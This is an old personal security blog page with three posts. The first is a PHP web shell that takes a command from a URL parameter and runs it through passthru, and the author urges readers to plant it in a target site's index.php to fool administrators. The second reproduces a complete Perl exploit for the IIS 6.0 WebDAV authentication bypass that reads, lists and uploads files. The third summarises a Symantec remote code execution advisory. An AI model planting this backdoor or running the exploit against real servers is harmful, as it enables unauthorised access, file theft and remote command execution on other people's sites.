Simple Backdooring
13 Nov 2009Long time no see, and long time i am not posting here.
I tired, long time build this web but my page rank still “0″ zero. But, the long time i have been thinking and i have conclusion, i must not posting for anything. Just do post !
Ok, this time I will give you some more tricks in security. What have you done when found some website with bugs there, put a backdoor? What backdoor if you did not find the root access?
Some people using CGI Telnet, and another use C99 shell or r57 shell.
But my tricks do same with very simple script, I called simple backdooring. Just do it on your target. Put this code into the index.php in the top of script.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | < ?php // This is simple backdooring tricks // do it with your risk $cmd = $_GET['cmd']; if(isset($cmd)) { echo "<pre>"; echo passthru($cmd); echo "< /pre>"; exit; } ?> |
If you put this into index.php on www.example.com, when you click just www.example.com there is nothing happen, but try the www.example.com/index.php?cmd=id see what do you get.
More website administrator have been tricked with this tricks.
Happy backdooring !!!
IIS 6.0 Webdav Exploit
30 May 2009There is an exploit for IIS 6.0 Webdav Remote Authentification Bypass bug wrote in Perl.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 | #!/usr/bin/perl -W # # Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit # written by ka0x <ka0x01 [alt+64]gmail.com> # # Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others! use IO::Socket ; my ( $host, $path ) = @ARGV ; my $port = 80 ; # webserver port &usage unless $ARGV[1] ; $host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ; $path =~ s/\/// if(substr($path, 0,1) eq '/'); sub _file { $file = shift ; open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ; while( <file> ){ $cont .= $_ ; } close(FILE) ; return $cont ; } print "write 'help' for get help list\n"; while( 1 ) { my $sock = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ; print "\$> "; chomp( my $option = <stdin> ) ; last if $option eq 'quit' ; if($option eq 'source') { $path =~ s/\//%c0%af\// ; print $sock "GET /".$path." HTTP/1.1\r\n" ; print $sock "Translate: f\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock "Connection: close\r\n\r\n" ; while(< $sock>){ print $_ ; } close($sock) ; } elsif($option eq 'path') { $path =~ s/\//%c0%af\// ; print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock "Connection:close\r\n" ; print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ; print $sock "Content-Length: 0\r\n\r\n" ; print $sock '< ?xml version="1.0" encoding="utf-8"?><d :propfind xmlns:D="DAV:"></d><d :prop xmlns:R="http://www.foo.bar/boxschema/"><r :bigbox/><r :author/><r :DingALing/><r :Random/></d>' ; while(< $sock>){ print $_ ; } close($sock) ; } elsif($option eq 'put') { $path =~ s/\//%c0%af\// ; print "[*] Insert a local file (ex: /root/file.txt): " ; chomp( $local = </stdin><stdin> ) ; $file_l = _file( $local ) ; print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ; print $sock "Connection:close\r\n" ; print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ; print $sock $file_l,"\r\n" ; while(< $sock>){ print $_ ; } close($sock) ; } elsif($option eq 'help') { print "\n\t\t- OPTIONS -\n\n\n" ; print "\thelp\t\tgive this help list\n" ; print "\tsource\t\tget file content\n" ; print "\tpath\t\tget directory contents\n" ; print "\tput\t\tput file\n" ; print "\tquit\t\texit exploit\n\n" ; } } sub usage { print < < 'EOH' ; $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit $ written by ka0x <ka0x01[at]gmail.com> $ 25/05/2009 usage: perl $0 <host> <path> example: perl $0 localhost dir/ perl $0 localhost dir/file.txt EOH exit; } </path></host></stdin></file></ka0x01> |
Desktop Phising
13 May 2009Symantec Vulnerability
13 May 2009
Based from Securiteam and CVE Information about Remote exploitation of a design error vulnerability in Symantec Corp.’s Symantec System Center may allow an attacker to execute arbitrary code with SYSTEM privileges.
XFR.EXE in the Intel File Transfer service in the console in Symantec Alert Management System 2 (AMS2), as used in Symantec System Center (SSS); Symantec AntiVirus Server; Symantec AntiVirus Central Quarantine Server; Symantec AntiVirus (SAV) Corporate Edition 9 before 9.0 MR7, 10.0 and 10.1 before 10.1 MR8, and 10.2 before 10.2 MR2; Symantec Client Security (SCS) 2 before 2.0 MR7 and 3 before 3.1 MR8; and Symantec Endpoint Protection (SEP) before 11.0 MR3, allows remote attackers to execute arbitrary code by placing the code on a (1) share or (2) WebDAV server, and then sending the UNC share pathname to this service.
About this blog
This blog is made by Muhammad Baiquni, dedicated to give all of you information about Computer, Security, Ebook reviews, Software, Tutorial, Web: HTML, PHP, MySQL, CSS, and more of million information.
If you like, please bookmark this web or feed us for be the first one get our newest information.
Photostream
Categories
- Computer Security (6)
- Ebooks Review (1)
- Information (6)
- Software (2)
- Web (6)
- SiR.BlaCk: Hey How To Extract This tar file on ma website ? [...]
- buying generic cialis: Thank you! You often write very interesting articles. You improved my mood. [...]
- Cornelius: I really like your blog and i respect your work. I'll be a frequent visitor. [...]
- www.fachrulfikri.com: nice tutor.. [...]
- Denim Skirt Upskirts: any more posts coming ? [...]
